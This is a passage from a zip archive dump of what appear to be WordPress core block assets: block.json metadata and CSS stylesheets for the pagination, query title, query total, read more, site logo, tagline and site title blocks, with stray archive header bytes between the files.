"default": { "type": "flex" } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } }, "editorStyle": "wp-block-query-pagination-editor", "style": "wp-block-query-pagination" } PK7[(query-pagination/editor.cssnu[.wp-block[data-align=center]>.wp-block-query-pagination{ justify-content:center; } .editor-styles-wrapper .wp-block-query-pagination{ max-width:100%; } .editor-styles-wrapper .wp-block-query-pagination.block-editor-block-list__layout{ margin:0; } .wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{ margin:.5em .5em .5em 0; } .wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{ margin-right:0; }PK7[rquery-pagination/style.min.cssnu[.wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{margin-bottom:.5em;margin-right:.5em}.wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{margin-right:0}.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-next:last-of-type{-webkit-margin-start:auto;margin-inline-start:auto}.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-previous:first-child{-webkit-margin-end:auto;margin-inline-end:auto}.wp-block-query-pagination .wp-block-query-pagination-previous-arrow{display:inline-block;margin-right:1ch}.wp-block-query-pagination .wp-block-query-pagination-previous-arrow:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-query-pagination .wp-block-query-pagination-next-arrow{display:inline-block;margin-left:1ch}.wp-block-query-pagination .wp-block-query-pagination-next-arrow:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-query-pagination.aligncenter{justify-content:center}PK7[ Pquery-pagination/editor-rtl.cssnu[.wp-block[data-align=center]>.wp-block-query-pagination{ justify-content:center; } .editor-styles-wrapper .wp-block-query-pagination{ max-width:100%; } .editor-styles-wrapper .wp-block-query-pagination.block-editor-block-list__layout{ margin:0; } .wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{ margin-bottom:.5em; margin-right:.5em; margin-top:.5em; } .wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{ margin-right:0; }PK7[4w#query-pagination/editor-rtl.min.cssnu[.wp-block[data-align=center]>.wp-block-query-pagination{justify-content:center}.editor-styles-wrapper .wp-block-query-pagination{max-width:100%}.editor-styles-wrapper .wp-block-query-pagination.block-editor-block-list__layout{margin:0}.wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{margin-bottom:.5em;margin-right:.5em;margin-top:.5em}.wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{margin-right:0}PK7[BKKquery-pagination/style-rtl.cssnu[.wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{ margin-bottom:.5em; margin-right:.5em; } .wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{ margin-right:0; } .wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-next:last-of-type{ -webkit-margin-start:auto; margin-inline-start:auto; } .wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-previous:first-child{ -webkit-margin-end:auto; margin-inline-end:auto; } .wp-block-query-pagination .wp-block-query-pagination-previous-arrow{ display:inline-block; margin-left:1ch; } .wp-block-query-pagination .wp-block-query-pagination-previous-arrow:not(.is-arrow-chevron){ transform:scaleX(-1);; } .wp-block-query-pagination .wp-block-query-pagination-next-arrow{ display:inline-block; margin-right:1ch; } .wp-block-query-pagination .wp-block-query-pagination-next-arrow:not(.is-arrow-chevron){ transform:scaleX(-1);; } .wp-block-query-pagination.aligncenter{ justify-content:center; }PK7[~GGquery-pagination/style.cssnu[.wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{ margin-bottom:.5em; margin-right:.5em; } .wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{ margin-right:0; } .wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-next:last-of-type{ -webkit-margin-start:auto; margin-inline-start:auto; } .wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-previous:first-child{ -webkit-margin-end:auto; margin-inline-end:auto; } .wp-block-query-pagination .wp-block-query-pagination-previous-arrow{ display:inline-block; margin-right:1ch; } .wp-block-query-pagination .wp-block-query-pagination-previous-arrow:not(.is-arrow-chevron){ transform:scaleX(1); } .wp-block-query-pagination .wp-block-query-pagination-next-arrow{ display:inline-block; margin-left:1ch; } .wp-block-query-pagination .wp-block-query-pagination-next-arrow:not(.is-arrow-chevron){ transform:scaleX(1); } .wp-block-query-pagination.aligncenter{ justify-content:center; }PK7[ Y query-pagination-next/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/query-pagination-next", "title": "Next Page", "category": "theme", "parent": [ "core/query-pagination" ], "description": "Displays the next posts page link.", "textdomain": "default", "attributes": { "label": { "type": "string" } }, "usesContext": [ "queryId", "query", "paginationArrow", "showLabel", "enhancedPagination" ], "supports": { "reusable": false, "html": false, "color": { "gradients": true, "text": false, "__experimentalDefaultControls": { "background": true } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } } } PK7[y֌'query-pagination-numbers/editor.min.cssnu[.wp-block-query-pagination-numbers a{text-decoration:underline}.wp-block-query-pagination-numbers .page-numbers{margin-right:2px}.wp-block-query-pagination-numbers .page-numbers:last-child{margin-right:0}PK7[{Q#query-pagination-numbers/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/query-pagination-numbers", "title": "Page Numbers", "category": "theme", "parent": [ "core/query-pagination" ], "description": "Displays a list of page numbers for pagination", "textdomain": "default", "attributes": { "midSize": { "type": "number", "default": 2 } }, "usesContext": [ "queryId", "query", "enhancedPagination" ], "supports": { "reusable": false, "html": false, "color": { "gradients": true, "text": false, "__experimentalDefaultControls": { "background": true } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } }, "editorStyle": "wp-block-query-pagination-numbers-editor" } PK7[J1Lo#query-pagination-numbers/editor.cssnu[.wp-block-query-pagination-numbers a{ text-decoration:underline; } .wp-block-query-pagination-numbers .page-numbers{ margin-right:2px; } .wp-block-query-pagination-numbers .page-numbers:last-child{ margin-right:0; }PK7['query-pagination-numbers/editor-rtl.cssnu[.wp-block-query-pagination-numbers a{ text-decoration:underline; } .wp-block-query-pagination-numbers .page-numbers{ margin-left:2px; } .wp-block-query-pagination-numbers .page-numbers:last-child{ margin-right:0; }PK7[ F+query-pagination-numbers/editor-rtl.min.cssnu[.wp-block-query-pagination-numbers a{text-decoration:underline}.wp-block-query-pagination-numbers .page-numbers{margin-left:2px}.wp-block-query-pagination-numbers .page-numbers:last-child{margin-right:0}PK7[N$query-pagination-previous/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/query-pagination-previous", "title": "Previous Page", "category": "theme", "parent": [ "core/query-pagination" ], "description": "Displays the previous posts page link.", "textdomain": "default", "attributes": { "label": { "type": "string" } }, "usesContext": [ "queryId", "query", "paginationArrow", "showLabel", "enhancedPagination" ], "supports": { "reusable": false, "html": false, "color": { "gradients": true, "text": false, "__experimentalDefaultControls": { "background": true } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } } } PK7[2/u,,query-title/style-rtl.min.cssnu[.wp-block-query-title{box-sizing:border-box}PK7[!fquery-title/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/query-title", "title": "Query Title", "category": "theme", "description": "Display the query title.", "textdomain": "default", "attributes": { "type": { "type": "string" }, "textAlign": { "type": "string" }, "level": { "type": "number", "default": 1 }, "showPrefix": { "type": "boolean", "default": true }, "showSearchTerm": { "type": "boolean", "default": true } }, "supports": { "align": [ "wide", "full" ], "html": false, "color": { "gradients": true, "__experimentalDefaultControls": { "background": true, "text": true } }, "spacing": { "margin": true, "padding": true }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontStyle": true, "__experimentalFontWeight": true, "__experimentalLetterSpacing": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalDefaultControls": { "fontSize": true, "fontAppearance": true, "textTransform": true } } }, "style": "wp-block-query-title" } PK7[2/u,,query-title/style.min.cssnu[.wp-block-query-title{box-sizing:border-box}PK7[K %11query-title/style-rtl.cssnu[.wp-block-query-title{ box-sizing:border-box; }PK7[K %11query-title/style.cssnu[.wp-block-query-title{ box-sizing:border-box; }PK7[.c,,query-total/style-rtl.min.cssnu[.wp-block-query-total{box-sizing:border-box}PK7[jLQ66query-total/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/query-total", "title": "Query Total", "category": "theme", "ancestor": [ "core/query" ], "description": "Display the total number of results in a query.", "textdomain": "default", "attributes": { "displayType": { "type": "string", "default": "total-results" } }, "usesContext": [ "queryId", "query" ], "supports": { "align": [ "wide", "full" ], "html": false, "spacing": { "margin": true, "padding": true }, "color": { "gradients": true, "__experimentalDefaultControls": { "background": true, "text": true } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } }, "__experimentalBorder": { "radius": true, "color": true, "width": true, "style": true, "__experimentalDefaultControls": { "radius": true, "color": true, "width": true, "style": true } }, "interactivity": { "clientNavigation": true } }, "style": "wp-block-query-total" } PK7[.c,,query-total/style.min.cssnu[.wp-block-query-total{box-sizing:border-box}PK7[T11query-total/style-rtl.cssnu[.wp-block-query-total{ box-sizing:border-box; }PK7[T11query-total/style.cssnu[.wp-block-query-total{ box-sizing:border-box; }PK7[&read-more/style-rtl.min.cssnu[.wp-block-read-more{display:block;width:-moz-fit-content;width:fit-content}.wp-block-read-more:not([style*=text-decoration]),.wp-block-read-more:not([style*=text-decoration]):active,.wp-block-read-more:not([style*=text-decoration]):focus{text-decoration:none}PK7[$read-more/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/read-more", "title": "Read More", "category": "theme", "description": "Displays the link of a post, page, or any other content-type.", "textdomain": "default", "attributes": { "content": { "type": "string" }, "linkTarget": { "type": "string", "default": "_self" } }, "usesContext": [ "postId" ], "supports": { "html": false, "color": { "gradients": true, "text": true }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalLetterSpacing": true, "__experimentalTextDecoration": true, "__experimentalDefaultControls": { "fontSize": true, "textDecoration": true } }, "spacing": { "margin": [ "top", "bottom" ], "padding": true, "__experimentalDefaultControls": { "padding": true } }, "__experimentalBorder": { "color": true, "radius": true, "width": true, "__experimentalDefaultControls": { "width": true } } }, "style": "wp-block-read-more" } PK7[&read-more/style.min.cssnu[.wp-block-read-more{display:block;width:-moz-fit-content;width:fit-content}.wp-block-read-more:not([style*=text-decoration]),.wp-block-read-more:not([style*=text-decoration]):active,.wp-block-read-more:not([style*=text-decoration]):focus{text-decoration:none}PK7[z=kread-more/style-rtl.cssnu[.wp-block-read-more{ display:block; width:-moz-fit-content; width:fit-content; } .wp-block-read-more:not([style*=text-decoration]),.wp-block-read-more:not([style*=text-decoration]):active,.wp-block-read-more:not([style*=text-decoration]):focus{ text-decoration:none; }PK7[z=kread-more/style.cssnu[.wp-block-read-more{ display:block; width:-moz-fit-content; width:fit-content; } .wp-block-read-more:not([style*=text-decoration]),.wp-block-read-more:not([style*=text-decoration]):active,.wp-block-read-more:not([style*=text-decoration]):focus{ text-decoration:none; }PK7[lK K site-logo/editor.min.cssnu[.wp-block-site-logo.aligncenter>div,.wp-block[data-align=center]>.wp-block-site-logo{display:table;margin-left:auto;margin-right:auto}.wp-block-site-logo a{pointer-events:none}.wp-block-site-logo .custom-logo-link{cursor:inherit}.wp-block-site-logo .custom-logo-link:focus{box-shadow:none}.wp-block-site-logo .custom-logo-link.is-transient img{opacity:.3}.wp-block-site-logo img{display:block;height:auto;max-width:100%}.wp-block-site-logo.wp-block-site-logo.is-default-size .components-placeholder{height:60px;width:60px}.wp-block-site-logo.wp-block-site-logo .components-resizable-box__container,.wp-block-site-logo.wp-block-site-logo>div{border-radius:inherit}.wp-block-site-logo.wp-block-site-logo .components-placeholder{align-items:center;border-radius:inherit;display:flex;height:100%;justify-content:center;min-height:48px;min-width:48px;padding:0;width:100%}.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-drop-zone__content-text,.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-form-file-upload{display:none}.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button{align-items:center;background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color);border-radius:50%;border-style:solid;color:#fff;display:flex;height:48px;justify-content:center;padding:0;position:relative;width:48px}.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button>svg{color:inherit}.block-library-site-logo__inspector-upload-container{position:relative}.block-library-site-logo__inspector-upload-container .components-drop-zone__content-icon{display:none}.block-library-site-logo__inspector-media-replace-container button.components-button,.block-library-site-logo__inspector-upload-container button.components-button{box-shadow:inset 0 0 0 1px #ccc;color:#1e1e1e;display:block;height:40px;width:100%}.block-library-site-logo__inspector-media-replace-container button.components-button:hover,.block-library-site-logo__inspector-upload-container button.components-button:hover{color:var(--wp-admin-theme-color)}.block-library-site-logo__inspector-media-replace-container button.components-button:focus,.block-library-site-logo__inspector-upload-container button.components-button:focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-media-replace-title,.block-library-site-logo__inspector-upload-container .block-library-site-logo__inspector-media-replace-title{text-align:start;text-align-last:center;white-space:normal;word-break:break-all}.block-library-site-logo__inspector-media-replace-container .components-dropdown{display:block}.block-library-site-logo__inspector-media-replace-container img{aspect-ratio:1;border-radius:50%!important;box-shadow:inset 0 0 0 1px rgba(0,0,0,.2);min-width:20px;width:20px}.block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-readonly-logo-preview{display:flex;height:40px;padding:6px 12px}PK7[[site-logo/style-rtl.min.cssnu[.wp-block-site-logo{box-sizing:border-box;line-height:0}.wp-block-site-logo a{display:inline-block;line-height:0}.wp-block-site-logo.is-default-size img{height:auto;width:120px}.wp-block-site-logo img{height:auto;max-width:100%}.wp-block-site-logo a,.wp-block-site-logo img{border-radius:inherit}.wp-block-site-logo.aligncenter{margin-left:auto;margin-right:auto;text-align:center}.wp-block-site-logo.is-style-rounded{border-radius:9999px}PK7[8Esite-logo/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/site-logo", "title": "Site Logo", "category": "theme", "description": "Display an image to represent this site. Update this block and the changes apply everywhere.", "textdomain": "default", "attributes": { "width": { "type": "number" }, "isLink": { "type": "boolean", "default": true }, "linkTarget": { "type": "string", "default": "_self" }, "shouldSyncIcon": { "type": "boolean" } }, "example": { "viewportWidth": 500, "attributes": { "width": 350, "className": "block-editor-block-types-list__site-logo-example" } }, "supports": { "html": false, "align": true, "alignWide": false, "color": { "__experimentalDuotone": "img, .components-placeholder__illustration, .components-placeholder::before", "text": false, "background": false }, "spacing": { "margin": true, "padding": true, "__experimentalDefaultControls": { "margin": false, "padding": false } } }, "styles": [ { "name": "default", "label": "Default", "isDefault": true }, { "name": "rounded", "label": "Rounded" } ], "editorStyle": "wp-block-site-logo-editor", "style": "wp-block-site-logo" } PK7["y4= = site-logo/editor.cssnu[.wp-block-site-logo.aligncenter>div,.wp-block[data-align=center]>.wp-block-site-logo{ display:table; margin-left:auto; margin-right:auto; } .wp-block-site-logo a{ pointer-events:none; } .wp-block-site-logo .custom-logo-link{ cursor:inherit; } .wp-block-site-logo .custom-logo-link:focus{ box-shadow:none; } .wp-block-site-logo .custom-logo-link.is-transient img{ opacity:.3; } .wp-block-site-logo img{ display:block; height:auto; max-width:100%; } .wp-block-site-logo.wp-block-site-logo.is-default-size .components-placeholder{ height:60px; width:60px; } .wp-block-site-logo.wp-block-site-logo .components-resizable-box__container,.wp-block-site-logo.wp-block-site-logo>div{ border-radius:inherit; } .wp-block-site-logo.wp-block-site-logo .components-placeholder{ align-items:center; border-radius:inherit; display:flex; height:100%; justify-content:center; min-height:48px; min-width:48px; padding:0; width:100%; } .wp-block-site-logo.wp-block-site-logo .components-placeholder .components-drop-zone__content-text,.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-form-file-upload{ display:none; } .wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button{ align-items:center; background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); border-radius:50%; border-style:solid; color:#fff; display:flex; height:48px; justify-content:center; padding:0; position:relative; width:48px; } .wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button>svg{ color:inherit; } .block-library-site-logo__inspector-upload-container{ position:relative; } .block-library-site-logo__inspector-upload-container .components-drop-zone__content-icon{ display:none; } .block-library-site-logo__inspector-media-replace-container button.components-button,.block-library-site-logo__inspector-upload-container button.components-button{ box-shadow:inset 0 0 0 1px #ccc; color:#1e1e1e; display:block; height:40px; width:100%; } .block-library-site-logo__inspector-media-replace-container button.components-button:hover,.block-library-site-logo__inspector-upload-container button.components-button:hover{ color:var(--wp-admin-theme-color); } .block-library-site-logo__inspector-media-replace-container button.components-button:focus,.block-library-site-logo__inspector-upload-container button.components-button:focus{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-media-replace-title,.block-library-site-logo__inspector-upload-container .block-library-site-logo__inspector-media-replace-title{ text-align:start; text-align-last:center; white-space:normal; word-break:break-all; } .block-library-site-logo__inspector-media-replace-container .components-dropdown{ display:block; } .block-library-site-logo__inspector-media-replace-container img{ aspect-ratio:1; border-radius:50% !important; box-shadow:inset 0 0 0 1px rgba(0,0,0,.2); min-width:20px; width:20px; } .block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-readonly-logo-preview{ display:flex; height:40px; padding:6px 12px; }PK7[[site-logo/style.min.cssnu[.wp-block-site-logo{box-sizing:border-box;line-height:0}.wp-block-site-logo a{display:inline-block;line-height:0}.wp-block-site-logo.is-default-size img{height:auto;width:120px}.wp-block-site-logo img{height:auto;max-width:100%}.wp-block-site-logo a,.wp-block-site-logo img{border-radius:inherit}.wp-block-site-logo.aligncenter{margin-left:auto;margin-right:auto;text-align:center}.wp-block-site-logo.is-style-rounded{border-radius:9999px}PK7["y4= = site-logo/editor-rtl.cssnu[.wp-block-site-logo.aligncenter>div,.wp-block[data-align=center]>.wp-block-site-logo{ display:table; margin-left:auto; margin-right:auto; } .wp-block-site-logo a{ pointer-events:none; } .wp-block-site-logo .custom-logo-link{ cursor:inherit; } .wp-block-site-logo .custom-logo-link:focus{ box-shadow:none; } .wp-block-site-logo .custom-logo-link.is-transient img{ opacity:.3; } .wp-block-site-logo img{ display:block; height:auto; max-width:100%; } .wp-block-site-logo.wp-block-site-logo.is-default-size .components-placeholder{ height:60px; width:60px; } .wp-block-site-logo.wp-block-site-logo .components-resizable-box__container,.wp-block-site-logo.wp-block-site-logo>div{ border-radius:inherit; } .wp-block-site-logo.wp-block-site-logo .components-placeholder{ align-items:center; border-radius:inherit; display:flex; height:100%; justify-content:center; min-height:48px; min-width:48px; padding:0; width:100%; } .wp-block-site-logo.wp-block-site-logo .components-placeholder .components-drop-zone__content-text,.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-form-file-upload{ display:none; } .wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button{ align-items:center; background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); border-radius:50%; border-style:solid; color:#fff; display:flex; height:48px; justify-content:center; padding:0; position:relative; width:48px; } .wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button>svg{ color:inherit; } .block-library-site-logo__inspector-upload-container{ position:relative; } .block-library-site-logo__inspector-upload-container .components-drop-zone__content-icon{ display:none; } .block-library-site-logo__inspector-media-replace-container button.components-button,.block-library-site-logo__inspector-upload-container button.components-button{ box-shadow:inset 0 0 0 1px #ccc; color:#1e1e1e; display:block; height:40px; width:100%; } .block-library-site-logo__inspector-media-replace-container button.components-button:hover,.block-library-site-logo__inspector-upload-container button.components-button:hover{ color:var(--wp-admin-theme-color); } .block-library-site-logo__inspector-media-replace-container button.components-button:focus,.block-library-site-logo__inspector-upload-container button.components-button:focus{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-media-replace-title,.block-library-site-logo__inspector-upload-container .block-library-site-logo__inspector-media-replace-title{ text-align:start; text-align-last:center; white-space:normal; word-break:break-all; } .block-library-site-logo__inspector-media-replace-container .components-dropdown{ display:block; } .block-library-site-logo__inspector-media-replace-container img{ aspect-ratio:1; border-radius:50% !important; box-shadow:inset 0 0 0 1px rgba(0,0,0,.2); min-width:20px; width:20px; } .block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-readonly-logo-preview{ display:flex; height:40px; padding:6px 12px; }PK7[lK K site-logo/editor-rtl.min.cssnu[.wp-block-site-logo.aligncenter>div,.wp-block[data-align=center]>.wp-block-site-logo{display:table;margin-left:auto;margin-right:auto}.wp-block-site-logo a{pointer-events:none}.wp-block-site-logo .custom-logo-link{cursor:inherit}.wp-block-site-logo .custom-logo-link:focus{box-shadow:none}.wp-block-site-logo .custom-logo-link.is-transient img{opacity:.3}.wp-block-site-logo img{display:block;height:auto;max-width:100%}.wp-block-site-logo.wp-block-site-logo.is-default-size .components-placeholder{height:60px;width:60px}.wp-block-site-logo.wp-block-site-logo .components-resizable-box__container,.wp-block-site-logo.wp-block-site-logo>div{border-radius:inherit}.wp-block-site-logo.wp-block-site-logo .components-placeholder{align-items:center;border-radius:inherit;display:flex;height:100%;justify-content:center;min-height:48px;min-width:48px;padding:0;width:100%}.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-drop-zone__content-text,.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-form-file-upload{display:none}.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button{align-items:center;background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color);border-radius:50%;border-style:solid;color:#fff;display:flex;height:48px;justify-content:center;padding:0;position:relative;width:48px}.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button>svg{color:inherit}.block-library-site-logo__inspector-upload-container{position:relative}.block-library-site-logo__inspector-upload-container .components-drop-zone__content-icon{display:none}.block-library-site-logo__inspector-media-replace-container button.components-button,.block-library-site-logo__inspector-upload-container button.components-button{box-shadow:inset 0 0 0 1px #ccc;color:#1e1e1e;display:block;height:40px;width:100%}.block-library-site-logo__inspector-media-replace-container button.components-button:hover,.block-library-site-logo__inspector-upload-container button.components-button:hover{color:var(--wp-admin-theme-color)}.block-library-site-logo__inspector-media-replace-container button.components-button:focus,.block-library-site-logo__inspector-upload-container button.components-button:focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-media-replace-title,.block-library-site-logo__inspector-upload-container .block-library-site-logo__inspector-media-replace-title{text-align:start;text-align-last:center;white-space:normal;word-break:break-all}.block-library-site-logo__inspector-media-replace-container .components-dropdown{display:block}.block-library-site-logo__inspector-media-replace-container img{aspect-ratio:1;border-radius:50%!important;box-shadow:inset 0 0 0 1px rgba(0,0,0,.2);min-width:20px;width:20px}.block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-readonly-logo-preview{display:flex;height:40px;padding:6px 12px}PK7[!3xsite-logo/style-rtl.cssnu[.wp-block-site-logo{ box-sizing:border-box; line-height:0; } .wp-block-site-logo a{ display:inline-block; line-height:0; } .wp-block-site-logo.is-default-size img{ height:auto; width:120px; } .wp-block-site-logo img{ height:auto; max-width:100%; } .wp-block-site-logo a,.wp-block-site-logo img{ border-radius:inherit; } .wp-block-site-logo.aligncenter{ margin-left:auto; margin-right:auto; text-align:center; } .wp-block-site-logo.is-style-rounded{ border-radius:9999px; }PK7[!3xsite-logo/style.cssnu[.wp-block-site-logo{ box-sizing:border-box; line-height:0; } .wp-block-site-logo a{ display:inline-block; line-height:0; } .wp-block-site-logo.is-default-size img{ height:auto; width:120px; } .wp-block-site-logo img{ height:auto; max-width:100%; } .wp-block-site-logo a,.wp-block-site-logo img{ border-radius:inherit; } .wp-block-site-logo.aligncenter{ margin-left:auto; margin-right:auto; text-align:center; } .wp-block-site-logo.is-style-rounded{ border-radius:9999px; }PK7[ß~qDDsite-tagline/editor.min.cssnu[.wp-block-site-tagline__placeholder{border:1px dashed;padding:1em 0}PK7[v--site-tagline/style-rtl.min.cssnu[.wp-block-site-tagline{box-sizing:border-box}PK7[TVsite-tagline/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/site-tagline", "title": "Site Tagline", "category": "theme", "description": "Describe in a few words what the site is about. The tagline can be used in search results or when sharing on social networks even if it’s not displayed in the theme design.", "keywords": [ "description" ], "textdomain": "default", "attributes": { "textAlign": { "type": "string" } }, "example": {}, "supports": { "align": [ "wide", "full" ], "html": false, "color": { "gradients": true, "__experimentalDefaultControls": { "background": true, "text": true } }, "spacing": { "margin": true, "padding": true, "__experimentalDefaultControls": { "margin": false, "padding": false } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalFontStyle": true, "__experimentalFontWeight": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } }, "editorStyle": "wp-block-site-tagline-editor" } PK7[LLsite-tagline/editor.cssnu[.wp-block-site-tagline__placeholder{ border:1px dashed; padding:1em 0; }PK7[v--site-tagline/style.min.cssnu[.wp-block-site-tagline{box-sizing:border-box}PK7[LLsite-tagline/editor-rtl.cssnu[.wp-block-site-tagline__placeholder{ border:1px dashed; padding:1em 0; }PK7[ß~qDDsite-tagline/editor-rtl.min.cssnu[.wp-block-site-tagline__placeholder{border:1px dashed;padding:1em 0}PK7[ S22site-tagline/style-rtl.cssnu[.wp-block-site-tagline{ box-sizing:border-box; }PK7[ S22site-tagline/style.cssnu[.wp-block-site-tagline{ box-sizing:border-box; }PK7[Ai~~site-title/editor.min.cssnu[.wp-block-site-title__placeholder{border:1px dashed;padding:1em 0}.editor-styles-wrapper .wp-block-site-title a{color:inherit}PK7[l%%site-title/style-rtl.min.cssnu[.wp-block-site-title a{color:inherit}PK7[site-title/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/site-title", "title": "Site Title", "category": "theme", "description": "Displays the name of this site. Update the block, and the changes apply everywhere it’s used. This will also appear in the browser title bar and in search results.", "textdomain": "default", "attributes": { "level": { "type": "number", "default": 1 }, "textAlign": { "type": "string" }, "isLink": { "type": "boolean", "default": true }, "linkTarget": { "type": "string", "default": "_self" } }, "example": { "viewportWidth": 500 }, "supports": { "align": [ "wide", "full" ], "html": false, "color": { "gradients": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true, "link": true } }, "spacing": { "padding": true, "margin": true, "__experimentalDefaultControls": { "margin": false, "padding": false } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalFontStyle": true, "__experimentalFontWeight": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true, 